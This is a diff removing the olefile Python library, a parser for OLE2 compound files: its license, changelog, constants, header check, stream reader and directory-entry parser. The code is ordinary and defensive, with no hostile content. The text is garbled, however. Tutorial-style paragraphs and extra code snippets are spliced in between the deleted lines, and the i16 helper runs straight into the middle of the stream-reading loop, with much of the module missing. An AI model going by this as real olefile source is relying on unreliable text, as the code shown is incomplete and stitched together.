-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-# ----------
-# PIL License:
-#
-# olefile is based on source code from the OleFileIO module of the Python
-# Imaging Library (PIL) published by Fredrik Lundh under the following license:
-
-# The Python Imaging Library (PIL) is
-# Copyright (c) 1997-2009 by Secret Labs AB
-# Copyright (c) 1995-2009 by Fredrik Lundh
-#
-# By obtaining, using, and/or copying this software and/or its associated
-# documentation, you agree that you have read, understood, and will comply with
-# the following terms and conditions:
-#
-# Permission to use, copy, modify, and distribute this software and its
-# associated documentation for any purpose and without fee is hereby granted,
-# provided that the above copyright notice appears in all copies, and that both
-# that copyright notice and this permission notice appear in supporting
-# documentation, and that the name of Secret Labs AB or the author(s) not be used
-# in advertising or publicity pertaining to distribution of the software
-# without specific, written prior permission.
-#
-# SECRET LABS AB AND THE AUTHORS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
-# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS.
-# IN NO EVENT SHALL SECRET LABS AB OR THE AUTHORS BE LIABLE FOR ANY SPECIAL,
-# INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
-# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
-# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
-# PERFORMANCE OF THIS SOFTWARE.
-
-#-----------------------------------------------------------------------------
-# CHANGELOG: (only olefile/OleFileIO_PL changes compared to PIL 1.1.6)
-# 2005-05-11 v0.10 PL: - a few fixes for Python 2.4 compatibility
-# (all changes flagged with [PL])
-# 2006-02-22 v0.11 PL: - a few fixes for some Office 2003 documents which raise
-# exceptions in OleStream.__init__()
-# 2006-06-09 v0.12 PL: - fixes for files above 6.8MB (DIFAT in loadfat)
-# - added some constants
-# - added header values checks
-# - added some docstrings
-# - getsect: bugfix in case sectors >512 bytes
-# - getsect: added conformity checks
-# - DEBUG_MODE constant to activate debug display
-# 2007-09-04 v0.13 PL: - improved/translated (lots of) comments
-# - updated license
-# - converted tabs to 4 spaces
-# 2007-11-19 v0.14 PL: - added OleFileIO._raise_defect() to adapt sensitivity
-# - improved _unicode() to use Python 2.x unicode support
-# - fixed bug in OleDirectoryEntry
-# 2007-11-25 v0.15 PL: - added safety checks to detect FAT loops
-# - fixed OleStream which didn't check stream size
-# - added/improved many docstrings and comments
-# - moved helper functions _unicode and _clsid out of
-# OleFileIO class
-# - improved OleFileIO._find() to add Unix path syntax
-# - OleFileIO._find() is now case-insensitive
-# - added get_type() and get_rootentry_name()
-# - rewritten loaddirectory and OleDirectoryEntry
-# 2007-11-27 v0.16 PL: - added OleDirectoryEntry.kids_dict
-# - added detection of duplicate filenames in storages
-# - added detection of duplicate references to streams
-# - added get_size() and exists() to OleDirectoryEntry
-# - added isOleFile to check header before parsing
-# - added __all__ list to control public keywords in pydoc
-# 2007-12-04 v0.17 PL: - added _load_direntry to fix a bug in loaddirectory
-# - improved _unicode(), added workarounds for Python <2.3
-# - added set_debug_mode and -d option to set debug mode
-# - fixed bugs in OleFileIO.open and OleDirectoryEntry
-# - added safety check in main for large or binary
-# properties
-# - allow size>0 for storages for some implementations
-# 2007-12-05 v0.18 PL: - fixed several bugs in handling of FAT, MiniFAT and
-# streams
-# - added option '-c' in main to check all streams
-# 2009-12-10 v0.19 PL: - bugfix for 32 bit arrays on 64 bits platforms
-# (thanks to Ben G. and Martijn for reporting the bug)
-# 2009-12-11 v0.20 PL: - bugfix in OleFileIO.open when filename is not plain str
-# 2010-01-22 v0.21 PL: - added support for big-endian CPUs such as PowerPC Macs
-# 2012-02-16 v0.22 PL: - fixed bug in getproperties, patch by chuckleberryfinn
-# (https://github.com/decalage2/olefile/issues/7)
-# - added close method to OleFileIO (fixed issue #2)
-# 2012-07-25 v0.23 PL: - added support for file-like objects (patch by mete0r_kr)
-# 2013-05-05 v0.24 PL: - getproperties: added conversion from filetime to python
-# datetime
-# - main: displays properties with date format
-# - new class OleMetadata to parse standard properties
-# - added get_metadata method
-# 2013-05-07 v0.24 PL: - a few improvements in OleMetadata
-# 2013-05-24 v0.25 PL: - getproperties: option to not convert some timestamps
-# - OleMetaData: total_edit_time is now a number of seconds,
-# not a timestamp
-# - getproperties: added support for VT_BOOL, VT_INT, V_UINT
-# - getproperties: filter out null chars from strings
-# - getproperties: raise non-fatal defects instead of
-# exceptions when properties cannot be parsed properly
-# 2013-05-27 PL: - getproperties: improved exception handling
-# - _raise_defect: added option to set exception type
-# - all non-fatal issues are now recorded, and displayed
-# when run as a script
-# 2013-07-11 v0.26 PL: - added methods to get modification and creation times
-# of a directory entry or a storage/stream
-# - fixed parsing of direntry timestamps
-# 2013-07-24 PL: - new options in listdir to list storages and/or streams
-# 2014-02-04 v0.30 PL: - upgraded code to support Python 3.x by Martin Panter
-# - several fixes for Python 2.6 (xrange, MAGIC)
-# - reused i32 from Pillow's _binary
-# 2014-07-18 v0.31 - preliminary support for 4K sectors
-# 2014-07-27 v0.31 PL: - a few improvements in OleFileIO.open (header parsing)
-# - Fixed loadfat for large files with 4K sectors (issue #3)
-# 2014-07-30 v0.32 PL: - added write_sect to write sectors to disk
-# - added write_mode option to OleFileIO.__init__ and open
-# 2014-07-31 PL: - fixed padding in write_sect for Python 3, added checks
-# - added write_stream to write a stream to disk
-# 2014-09-26 v0.40 PL: - renamed OleFileIO_PL to olefile
-# 2014-11-09 NE: - added support for Jython (Niko Ehrenfeuchter)
-# 2014-11-13 v0.41 PL: - improved isOleFile and OleFileIO.open to support OLE
-# data in a string buffer and file-like objects.
-# 2014-11-21 PL: - updated comments according to Pillow's commits
-# 2015-01-24 v0.42 PL: - changed the default path name encoding from Latin-1
-# to UTF-8 on Python 2.x (Unicode on Python 3.x)
-# - added path_encoding option to override the default
-# - fixed a bug in _list when a storage is empty
-# 2015-04-17 v0.43 PL: - slight changes in OleDirectoryEntry
-# 2015-10-19 - fixed issue #26 in OleFileIO.getproperties
-# (using id and type as local variable names)
-# 2015-10-29 - replaced debug() with proper logging
-# - use optparse to handle command line options
-# - improved attribute names in OleFileIO class
-# 2015-11-05 - fixed issue #27 by correcting the MiniFAT sector
-# cutoff size if invalid.
-# 2016-02-02 - logging is disabled by default
-# 2016-04-26 v0.44 PL: - added enable_logging
-# - renamed _OleDirectoryEntry and _OleStream without '_'
-# - in OleStream use _raise_defect instead of exceptions
-# 2016-04-27 - added support for incomplete streams and incorrect
-# directory entries (to read malformed documents)
-# 2016-05-04 - fixed slight bug in OleStream
-# 2016-11-27 DR: - added method to get the clsid of a storage/stream
-# (Daniel Roethlisberger)
-# 2017-05-31 v0.45 BS: - PR #114 from oletools to handle excessive number of
-# properties:
-# https://github.com/decalage2/oletools/pull/114
-# 2017-07-11 PL: - ignore incorrect ByteOrder (issue #70)
-
-__date__ = "2017-07-11"
-__version__ = '0.45dev2'
-__author__ = "Philippe Lagadec"
-
-#-----------------------------------------------------------------------------
-# TODO (for version 1.0):
-# + get rid of print statements, to simplify Python 2.x and 3.x support
-# + add is_stream and is_storage
-# + remove leading and trailing slashes where a path is used
-# + add functions path_list2str and path_str2list
-# + fix how all the methods handle unicode str and/or bytes as arguments
-# + add path attrib to _OleDirEntry, set it once and for all in init or
-# append_kids (then listdir/_list can be simplified)
-# - TESTS with Linux, MacOSX, Python 1.5.2, various files, PIL, ...
-# - add underscore to each private method, to avoid their display in
-# pydoc/epydoc documentation - Remove it for classes to be documented
-# - replace all raised exceptions with _raise_defect (at least in OleFileIO)
-# - merge code from OleStream and OleFileIO.getsect to read sectors
-# (maybe add a class for FAT and MiniFAT ?)
-# - add method to check all streams (follow sectors chains without storing all
-# stream in memory, and report anomalies)
-# - use OleDirectoryEntry.kids_dict to improve _find and _list ?
-# - fix Unicode names handling (find some way to stay compatible with Py1.5.2)
-# => if possible avoid converting names to Latin-1
-# - review DIFAT code: fix handling of DIFSECT blocks in FAT (not stop)
-# - rewrite OleFileIO.getproperties
-# - improve docstrings to show more sample uses
-# - see also original notes and FIXME below
-# - remove all obsolete FIXMEs
-# - OleMetadata: fix version attrib according to
-# https://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
-
-# IDEAS:
-# - in OleFileIO._open and OleStream, use size=None instead of 0x7FFFFFFF for
-# streams with unknown size
-# - use arrays of int instead of long integers for FAT/MiniFAT, to improve
-# performance and reduce memory usage ? (possible issue with values >2^31)
-# - provide tests with unittest (may need write support to create samples)
-# - move all debug code (and maybe dump methods) to a separate module, with
-# a class which inherits OleFileIO ?
-# - fix docstrings to follow epydoc format
-# - add support for big endian byte order ?
-# - create a simple OLE explorer with wxPython
-
-# FUTURE EVOLUTIONS to add write support:
-# see issue #6 on GitHub:
-# https://github.com/decalage2/olefile/issues/6
-
-#-----------------------------------------------------------------------------
-# NOTES from PIL 1.1.6:
-
-# History:
-# 1997-01-20 fl Created
-# 1997-01-22 fl Fixed 64-bit portability quirk
-# 2003-09-09 fl Fixed typo in OleFileIO.loadfat (noted by Daniel Haertle)
-# 2004-02-29 fl Changed long hex constants to signed integers
-#
-# Notes:
-# FIXME: sort out sign problem (eliminate long hex constants)
-# FIXME: change filename to use "a/b/c" instead of ["a", "b", "c"]
-# FIXME: provide a glob mechanism function (using fnmatchcase)
-#
-# Literature:
-#
-# "FlashPix Format Specification, Appendix A", Kodak and Microsoft,
-# September 1996.
-#
-# Quotes:
-#
-# "If this document and functionality of the Software conflict,
-# the actual functionality of the Software represents the correct
-# functionality" -- Microsoft, in the OLE format specification
-
-#------------------------------------------------------------------------------
-
-__all__ = ['isOleFile', 'OleFileIO', 'OleMetadata', 'enable_logging',
- 'MAGIC', 'STGTY_EMPTY',
- 'STGTY_STREAM', 'STGTY_STORAGE', 'STGTY_ROOT', 'STGTY_PROPERTY',
- 'STGTY_LOCKBYTES', 'MINIMAL_OLEFILE_SIZE', 'NOSTREAM']
-
-import io
-import sys
-import struct, array, os.path, datetime, logging
-
-#=== COMPATIBILITY WORKAROUNDS ================================================
-
-#[PL] Define explicitly the public API to avoid private objects in pydoc:
-#TODO: add more
-# __all__ = ['OleFileIO', 'isOleFile', 'MAGIC']
-
-# For Python 3.x, need to redefine long as int:
-if str is not bytes:
- long = int
-
-# Need to make sure we use xrange both on Python 2 and 3.x:
-try:
- # on Python 2 we need xrange:
- iterrange = xrange
-except:
- # no xrange, for Python 3 it was renamed as range:
- iterrange = range
-
-#[PL] workaround to fix an issue with array item size on 64 bits systems:
-if array.array('L').itemsize == 4:
- # on 32 bits platforms, long integers in an array are 32 bits:
- UINT32 = 'L'
-elif array.array('I').itemsize == 4:
- # on 64 bits platforms, integers in an array are 32 bits:
- UINT32 = 'I'
-elif array.array('i').itemsize == 4:
- # On 64 bit Jython, signed integers ('i') are the only way to store our 32
- # bit values in an array in a *somewhat* reasonable way, as the otherwise
- # perfectly suited 'H' (unsigned int, 32 bits) results in a completely
- # unusable behaviour. This is most likely caused by the fact that Java
- # doesn't have unsigned values, and thus Jython's "array" implementation,
- # which is based on "jarray", doesn't have them either.
- # NOTE: to trick Jython into converting the values it would normally
- # interpret as "signed" into "unsigned", a binary-and operation with
- # 0xFFFFFFFF can be used. This way it is possible to use the same comparing
- # operations on all platforms / implementations. The corresponding code
- # lines are flagged with a 'JYTHON-WORKAROUND' tag below.
- UINT32 = 'i'
-else:
- raise ValueError('Need to fix a bug with 32 bit arrays, please contact author...')
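The typecode selection above can be condensed into a single probing loop; this sketch mirrors the same order of preference (`'L'`, then `'I'`, then `'i'`) without claiming to replace the original's per-platform comments:

```python
import array

# probe for an array typecode whose items are exactly 4 bytes,
# in the same preference order as the workaround: 'L', 'I', 'i'
for typecode in ('L', 'I', 'i'):
    if array.array(typecode).itemsize == 4:
        UINT32 = typecode
        break
else:
    raise ValueError('no 4-byte array typecode found on this platform')

print(UINT32, array.array(UINT32).itemsize)
```

On a typical 64-bit CPython, `'L'` is 8 bytes, so the probe lands on `'I'`; on 32-bit builds it stops at `'L'`. The FAT parsing code only cares that items are exactly 32 bits.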
-
-
-#[PL] These workarounds were inspired from the Path module
-# (see http://www.jorendorff.com/articles/python/path/)
-try:
- basestring
-except NameError:
- basestring = str
-
-#[PL] Experimental setting: if True, OLE filenames will be kept in Unicode
-# if False (default PIL behaviour), all filenames are converted to Latin-1.
-KEEP_UNICODE_NAMES = True
-
-if sys.version_info[0] < 3:
- # On Python 2.x, the default encoding for path names is UTF-8:
- DEFAULT_PATH_ENCODING = 'utf-8'
-else:
- # On Python 3.x, the default encoding for path names is Unicode (None):
- DEFAULT_PATH_ENCODING = None
-
-
-# === LOGGING =================================================================
-
-class NullHandler(logging.Handler):
- """
- Log Handler without output, to avoid printing messages if logging is not
- configured by the main application.
- Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
- """
- def emit(self, record):
- pass
-
-def get_logger(name, level=logging.CRITICAL+1):
- """
- Create a suitable logger object for this module.
- The goal is not to change settings of the root logger, to avoid getting
- other modules' logs on the screen.
- If a logger exists with same name, reuse it. (Else it would have duplicate
- handlers and messages would be doubled.)
- The level is set to CRITICAL+1 by default, to avoid any logging.
- """
- # First, test if there is already a logger with the same name, else it
- # will generate duplicate messages (due to duplicate handlers):
- if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
- # use getLogger then test if its effective level is not default.
- logger = logging.getLogger(name)
- # make sure level is OK:
- logger.setLevel(level)
- return logger
- # get a new logger:
- logger = logging.getLogger(name)
- # only add a NullHandler for this logger, it is up to the application
- # to configure its own logging:
- logger.addHandler(NullHandler())
- logger.setLevel(level)
- return logger
-
-
-# a global logger object used for debugging:
-log = get_logger('olefile')
-
-
-def enable_logging():
- """
- Enable logging for this module (disabled by default).
- This will set the module-specific logger level to NOTSET, which
- means the main application controls the actual logging level.
- """
- log.setLevel(logging.NOTSET)
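The pattern above (NullHandler plus a level above CRITICAL, re-opened by `enable_logging`) is the standard library-logging idiom. A self-contained sketch with an illustrative logger name:

```python
import logging

# library-style logger: silent unless the application opts in
log = logging.getLogger('olefile_demo')     # name is illustrative
log.addHandler(logging.NullHandler())       # no output handler of our own
log.setLevel(logging.CRITICAL + 1)          # above CRITICAL: nothing passes

def enable_logging():
    # NOTSET defers the effective level to the application's root config
    log.setLevel(logging.NOTSET)

enable_logging()
print(log.level)  # 0, i.e. logging.NOTSET
```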
-
-
-#=== CONSTANTS ===============================================================
-
-#: magic bytes that should be at the beginning of every OLE file:
-MAGIC = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'
-
-#[PL]: added constants for Sector IDs (from AAF specifications)
-MAXREGSECT = 0xFFFFFFFA #: (-6) maximum SECT
-DIFSECT = 0xFFFFFFFC #: (-4) denotes a DIFAT sector in a FAT
-FATSECT = 0xFFFFFFFD #: (-3) denotes a FAT sector in a FAT
-ENDOFCHAIN = 0xFFFFFFFE #: (-2) end of a virtual stream chain
-FREESECT = 0xFFFFFFFF #: (-1) unallocated sector
-
-#[PL]: added constants for Directory Entry IDs (from AAF specifications)
-MAXREGSID = 0xFFFFFFFA #: (-6) maximum directory entry ID
-NOSTREAM = 0xFFFFFFFF #: (-1) unallocated directory entry
-
-#[PL] object types in storage (from AAF specifications)
-STGTY_EMPTY = 0 #: empty directory entry
-STGTY_STORAGE = 1 #: element is a storage object
-STGTY_STREAM = 2 #: element is a stream object
-STGTY_LOCKBYTES = 3 #: element is an ILockBytes object
-STGTY_PROPERTY = 4 #: element is an IPropertyStorage object
-STGTY_ROOT = 5 #: element is a root storage
-
-# Unknown size for a stream (used by OleStream):
-UNKNOWN_SIZE = 0x7FFFFFFF
-
-#
-# --------------------------------------------------------------------
-# property types
-
-VT_EMPTY=0; VT_NULL=1; VT_I2=2; VT_I4=3; VT_R4=4; VT_R8=5; VT_CY=6;
-VT_DATE=7; VT_BSTR=8; VT_DISPATCH=9; VT_ERROR=10; VT_BOOL=11;
-VT_VARIANT=12; VT_UNKNOWN=13; VT_DECIMAL=14; VT_I1=16; VT_UI1=17;
-VT_UI2=18; VT_UI4=19; VT_I8=20; VT_UI8=21; VT_INT=22; VT_UINT=23;
-VT_VOID=24; VT_HRESULT=25; VT_PTR=26; VT_SAFEARRAY=27; VT_CARRAY=28;
-VT_USERDEFINED=29; VT_LPSTR=30; VT_LPWSTR=31; VT_FILETIME=64;
-VT_BLOB=65; VT_STREAM=66; VT_STORAGE=67; VT_STREAMED_OBJECT=68;
-VT_STORED_OBJECT=69; VT_BLOB_OBJECT=70; VT_CF=71; VT_CLSID=72;
-VT_VECTOR=0x1000;
-
-# map property id to name (for debugging purposes)
-
-VT = {}
-for keyword, var in list(vars().items()):
- if keyword[:3] == "VT_":
- VT[var] = keyword
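The loop above scans module globals for `VT_*` names to build an id-to-name map for debugging. The same inversion, reproduced standalone over a small explicit subset for illustration:

```python
# subset of the VT_* constants, mirroring the scan over vars() above
VT_CONSTANTS = {'VT_EMPTY': 0, 'VT_I4': 3, 'VT_LPWSTR': 31, 'VT_FILETIME': 64}

# invert name -> id into id -> name, as the module's VT dict does
VT = {value: name for name, value in VT_CONSTANTS.items()}

print(VT[64])  # VT_FILETIME
```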
-
-#
-# --------------------------------------------------------------------
-# Some common document types (root.clsid fields)
-
-WORD_CLSID = "00020900-0000-0000-C000-000000000046"
-#TODO: check Excel, PPT, ...
-
-#[PL]: Defect levels to classify parsing errors - see OleFileIO._raise_defect()
-DEFECT_UNSURE = 10 # a case which looks weird, but not sure it's a defect
-DEFECT_POTENTIAL = 20 # a potential defect
-DEFECT_INCORRECT = 30 # an error according to specifications, but parsing
- # can go on
-DEFECT_FATAL = 40 # an error which cannot be ignored, parsing is
- # impossible
-
-# Minimal size of an empty OLE file, with 512-bytes sectors = 1536 bytes
-# (this is used in isOleFile and OleFile.open)
-MINIMAL_OLEFILE_SIZE = 1536
-
-#[PL] add useful constants to __all__:
-# for key in list(vars().keys()):
-# if key.startswith('STGTY_') or key.startswith('DEFECT_'):
-# __all__.append(key)
-
-
-#=== FUNCTIONS ===============================================================
-
-def isOleFile (filename):
- """
- Test if a file is an OLE container (according to the magic bytes in its header).
-
- .. note::
- This function only checks the first 8 bytes of the file, not the
- rest of the OLE structure.
-
- .. versionadded:: 0.16
-
- :param filename: filename, contents or file-like object of the OLE file (string-like or file-like object)
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read and seek methods),
- it is parsed as-is.
-
- :type filename: bytes or str or unicode or file
- :returns: True if OLE, False otherwise.
- :rtype: bool
- """
- # check if filename is a string-like or file-like object:
- if hasattr(filename, 'read'):
- # file-like object: use it directly
- header = filename.read(len(MAGIC))
- # just in case, seek back to start of file:
- filename.seek(0)
- elif isinstance(filename, bytes) and len(filename) >= MINIMAL_OLEFILE_SIZE:
- # filename is a bytes string containing the OLE file to be parsed:
- header = filename[:len(MAGIC)]
- else:
- # string-like object: filename of file on disk
- with open(filename, 'rb') as fp:
- header = fp.read(len(MAGIC))
- if header == MAGIC:
- return True
- else:
- return False
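For the file-like branch, `isOleFile` reduces to comparing the first 8 bytes with `MAGIC` and seeking back. This sketch exercises that check against in-memory buffers (`looks_like_ole` is an illustrative name, not the olefile API):

```python
import io

MAGIC = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'  # OLE2 header signature

def looks_like_ole(fileobj):
    # read only the magic bytes, then rewind so the caller can still parse
    header = fileobj.read(len(MAGIC))
    fileobj.seek(0)
    return header == MAGIC

fake_ole = io.BytesIO(MAGIC + b'\x00' * 1528)  # minimal 1536-byte container
not_ole = io.BytesIO(b'PK\x03\x04' + b'\x00' * 60)  # ZIP signature instead
print(looks_like_ole(fake_ole), looks_like_ole(not_ole))  # True False
```

As the docstring notes, this checks only the signature, not the rest of the structure, so a truncated or corrupt container can still pass.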
-
-
-if bytes is str:
- # version for Python 2.x
- def i8(c):
- return ord(c)
-else:
- # version for Python 3.x
- def i8(c):
- return c if c.__class__ is int else c[0]
-
-
-def i16(c, o = 0):
- """
- Converts a 2-bytes (16 bits) string to an integer.
-
- :param c: string containing bytes to convert
- :param o: offset of bytes to convert in string
- """
-    return struct.unpack("<H", c[o:o+2])[0]
-        if nb_sectors > len(fat):
- self.ole._raise_defect(DEFECT_INCORRECT, 'malformed OLE document, stream too large')
- # optimization(?): data is first a list of strings, and join() is called
- # at the end to concatenate all in one string.
- # (this may not be really useful with recent Python versions)
- data = []
- # if size is zero, then first sector index should be ENDOFCHAIN:
- if size == 0 and sect != ENDOFCHAIN:
- log.debug('size == 0 and sect != ENDOFCHAIN:')
- self.ole._raise_defect(DEFECT_INCORRECT, 'incorrect OLE sector index for empty stream')
- #[PL] A fixed-length for loop is used instead of an undefined while
- # loop to avoid DoS attacks:
- for i in range(nb_sectors):
- log.debug('Reading stream sector[%d] = %Xh' % (i, sect))
- # Sector index may be ENDOFCHAIN, but only if size was unknown
- if sect == ENDOFCHAIN:
- if unknown_size:
- log.debug('Reached ENDOFCHAIN sector for stream with unknown size')
- break
- else:
- # else this means that the stream is smaller than declared:
- log.debug('sect=ENDOFCHAIN before expected size')
- self.ole._raise_defect(DEFECT_INCORRECT, 'incomplete OLE stream')
- # sector index should be within FAT:
- if sect<0 or sect>=len(fat):
- log.debug('sect=%d (%X) / len(fat)=%d' % (sect, sect, len(fat)))
- log.debug('i=%d / nb_sectors=%d' %(i, nb_sectors))
-## tmp_data = b"".join(data)
-## f = open('test_debug.bin', 'wb')
-## f.write(tmp_data)
-## f.close()
-## log.debug('data read so far: %d bytes' % len(tmp_data))
- self.ole._raise_defect(DEFECT_INCORRECT, 'incorrect OLE FAT, sector index out of range')
- # stop reading here if the exception is ignored:
- break
- #TODO: merge this code with OleFileIO.getsect() ?
- #TODO: check if this works with 4K sectors:
- try:
- fp.seek(offset + sectorsize * sect)
-        except Exception:
- log.debug('sect=%d, seek=%d, filesize=%d' %
- (sect, offset+sectorsize*sect, filesize))
- self.ole._raise_defect(DEFECT_INCORRECT, 'OLE sector index out of range')
- # stop reading here if the exception is ignored:
- break
- sector_data = fp.read(sectorsize)
- # [PL] check if there was enough data:
- # Note: if sector is the last of the file, sometimes it is not a
- # complete sector (of 512 or 4K), so we may read less than
- # sectorsize.
- if len(sector_data)!=sectorsize and sect!=(len(fat)-1):
- log.debug('sect=%d / len(fat)=%d, seek=%d / filesize=%d, len read=%d' %
- (sect, len(fat), offset+sectorsize*sect, filesize, len(sector_data)))
- log.debug('seek+len(read)=%d' % (offset+sectorsize*sect+len(sector_data)))
- self.ole._raise_defect(DEFECT_INCORRECT, 'incomplete OLE sector')
- data.append(sector_data)
- # jump to next sector in the FAT:
- try:
- sect = fat[sect] & 0xFFFFFFFF # JYTHON-WORKAROUND
- except IndexError:
- # [PL] if pointer is out of the FAT an exception is raised
- self.ole._raise_defect(DEFECT_INCORRECT, 'incorrect OLE FAT, sector index out of range')
- # stop reading here if the exception is ignored:
- break
- #[PL] Last sector should be a "end of chain" marker:
- # if sect != ENDOFCHAIN:
- # raise IOError('incorrect last sector index in OLE stream')
- data = b"".join(data)
- # Data is truncated to the actual stream size:
- if len(data) >= size:
- log.debug('Read data of length %d, truncated to stream size %d' % (len(data), size))
- data = data[:size]
- # actual stream size is stored for future use:
- self.size = size
- elif unknown_size:
- # actual stream size was not known, now we know the size of read
- # data:
- log.debug('Read data of length %d, the stream size was unknown' % len(data))
- self.size = len(data)
- else:
- # read data is less than expected:
- log.debug('Read data of length %d, less than expected stream size %d' % (len(data), size))
- # TODO: provide details in exception message
- self.size = len(data)
- self.ole._raise_defect(DEFECT_INCORRECT, 'OLE stream size is less than declared')
- # when all data is read in memory, BytesIO constructor is called
- io.BytesIO.__init__(self, data)
- # Then the OleStream object can be used as a read-only file object.
-
-
-#--- OleDirectoryEntry -------------------------------------------------------
-
-class OleDirectoryEntry:
-
- """
- OLE2 Directory Entry
- """
- #[PL] parsing code moved from OleFileIO.loaddirectory
-
- # struct to parse directory entries:
- # <: little-endian byte order, standard sizes
- # (note: this should guarantee that Q returns a 64 bits int)
- # 64s: string containing entry name in unicode UTF-16 (max 31 chars) + null char = 64 bytes
- # H: uint16, number of bytes used in name buffer, including null = (len+1)*2
- # B: uint8, dir entry type (between 0 and 5)
- # B: uint8, color: 0=black, 1=red
- # I: uint32, index of left child node in the red-black tree, NOSTREAM if none
- # I: uint32, index of right child node in the red-black tree, NOSTREAM if none
- # I: uint32, index of child root node if it is a storage, else NOSTREAM
- # 16s: CLSID, unique identifier (only used if it is a storage)
- # I: uint32, user flags
- # Q (was 8s): uint64, creation timestamp or zero
- # Q (was 8s): uint64, modification timestamp or zero
- # I: uint32, SID of first sector if stream or ministream, SID of 1st sector
- # of stream containing ministreams if root entry, 0 otherwise
- # I: uint32, total stream size in bytes if stream (low 32 bits), 0 otherwise
- # I: uint32, total stream size in bytes if stream (high 32 bits), 0 otherwise
- STRUCT_DIRENTRY = '<64sHBBIII16sIQQIII'
- # size of a directory entry: 128 bytes
- DIRENTRY_SIZE = 128
- assert struct.calcsize(STRUCT_DIRENTRY) == DIRENTRY_SIZE
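The `STRUCT_DIRENTRY` format above can be exercised with a synthetic round-trip. A sketch under assumptions: the field values (`5` for STGTY_ROOT, sentinel `0xFFFFFFFF` for "no sibling") follow the comments in the deleted code, but the entry itself is fabricated for illustration.

```python
import struct

STRUCT_DIRENTRY = '<64sHBBIII16sIQQIII'  # same format as OleDirectoryEntry
assert struct.calcsize(STRUCT_DIRENTRY) == 128

# Build a synthetic "Root Entry" directory entry:
name = 'Root Entry'.encode('utf-16-le')
name_field = name + b'\x00' * (64 - len(name))   # padded to the 64-byte buffer
entry = struct.pack(STRUCT_DIRENTRY,
                    name_field, len(name) + 2,   # name + length incl. null
                    5,                           # entry type: STGTY_ROOT
                    1,                           # color: red
                    0xFFFFFFFF, 0xFFFFFFFF,      # no left/right sibling
                    1,                           # child SID
                    b'\x00' * 16,                # CLSID
                    0, 0, 0,                     # user flags, create/modify time
                    3,                           # first sector
                    0x240, 0)                    # size low/high
fields = struct.unpack(STRUCT_DIRENTRY, entry)
name_back = fields[0][:fields[1] - 2].decode('utf-16-le')
print(name_back, fields[2], fields[12])  # Root Entry 5 576
```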
-
-
- def __init__(self, entry, sid, olefile):
- """
- Constructor for an OleDirectoryEntry object.
- Parses a 128-bytes entry from the OLE Directory stream.
-
- :param entry : string (must be 128 bytes long)
- :param sid : index of this directory entry in the OLE file directory
- :param olefile: OleFileIO containing this directory entry
- """
- self.sid = sid
- # ref to olefile is stored for future use
- self.olefile = olefile
- # kids is a list of children entries, if this entry is a storage:
- # (list of OleDirectoryEntry objects)
- self.kids = []
- # kids_dict is a dictionary of children entries, indexed by their
- # name in lowercase: used to quickly find an entry, and to detect
- # duplicates
- self.kids_dict = {}
- # flag used to detect if the entry is referenced more than once in
- # directory:
- self.used = False
- # decode DirEntry
- (
- self.name_raw, # 64s: string containing entry name in unicode UTF-16 (max 31 chars) + null char = 64 bytes
- self.namelength, # H: uint16, number of bytes used in name buffer, including null = (len+1)*2
- self.entry_type,
- self.color,
- self.sid_left,
- self.sid_right,
- self.sid_child,
- clsid,
- self.dwUserFlags,
- self.createTime,
- self.modifyTime,
- self.isectStart,
- self.sizeLow,
- self.sizeHigh
- ) = struct.unpack(OleDirectoryEntry.STRUCT_DIRENTRY, entry)
- if self.entry_type not in [STGTY_ROOT, STGTY_STORAGE, STGTY_STREAM, STGTY_EMPTY]:
- olefile._raise_defect(DEFECT_INCORRECT, 'unhandled OLE storage type')
- # only first directory entry can (and should) be root:
- if self.entry_type == STGTY_ROOT and sid != 0:
- olefile._raise_defect(DEFECT_INCORRECT, 'duplicate OLE root entry')
- if sid == 0 and self.entry_type != STGTY_ROOT:
- olefile._raise_defect(DEFECT_INCORRECT, 'incorrect OLE root entry')
- #log.debug(struct.unpack(fmt_entry, entry[:len_entry]))
- # name should be at most 31 unicode characters + null character,
- # so 64 bytes in total (31*2 + 2):
- if self.namelength>64:
- olefile._raise_defect(DEFECT_INCORRECT, 'incorrect DirEntry name length >64 bytes')
- # if exception not raised, namelength is set to the maximum value:
- self.namelength = 64
- # only characters without ending null char are kept:
- self.name_utf16 = self.name_raw[:(self.namelength-2)]
- #TODO: check if the name is actually followed by a null unicode character ([MS-CFB] 2.6.1)
- #TODO: check if the name does not contain forbidden characters:
- # [MS-CFB] 2.6.1: "The following characters are illegal and MUST NOT be part of the name: '/', '\', ':', '!'."
- # name is converted from UTF-16LE to the path encoding specified in the OleFileIO:
- self.name = olefile._decode_utf16_str(self.name_utf16)
-
- log.debug('DirEntry SID=%d: %s' % (self.sid, repr(self.name)))
- log.debug(' - type: %d' % self.entry_type)
- log.debug(' - sect: %Xh' % self.isectStart)
- log.debug(' - SID left: %d, right: %d, child: %d' % (self.sid_left,
- self.sid_right, self.sid_child))
-
- # sizeHigh is only used for 4K sectors, it should be zero for 512 bytes
